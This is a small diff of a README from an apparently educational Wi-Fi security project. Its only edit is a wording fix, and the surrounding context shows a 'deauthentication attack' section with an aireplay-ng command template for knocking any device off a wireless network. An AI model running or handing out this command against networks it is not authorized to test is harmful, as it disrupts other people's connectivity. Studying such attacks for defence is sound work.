JulienFink/WiFi-Project/README.md

 3. Deauthentication attack (disconnect any device from the network):

 This attack will always work !
-The only way around it is to change the MAC address on the target machine.
+The only way around it is to change the MAC address of the target machine.
 ```
 aireplay-ng --deauth time_out -a router_addr -c target_mac_addr wireless_adapter_name
 ```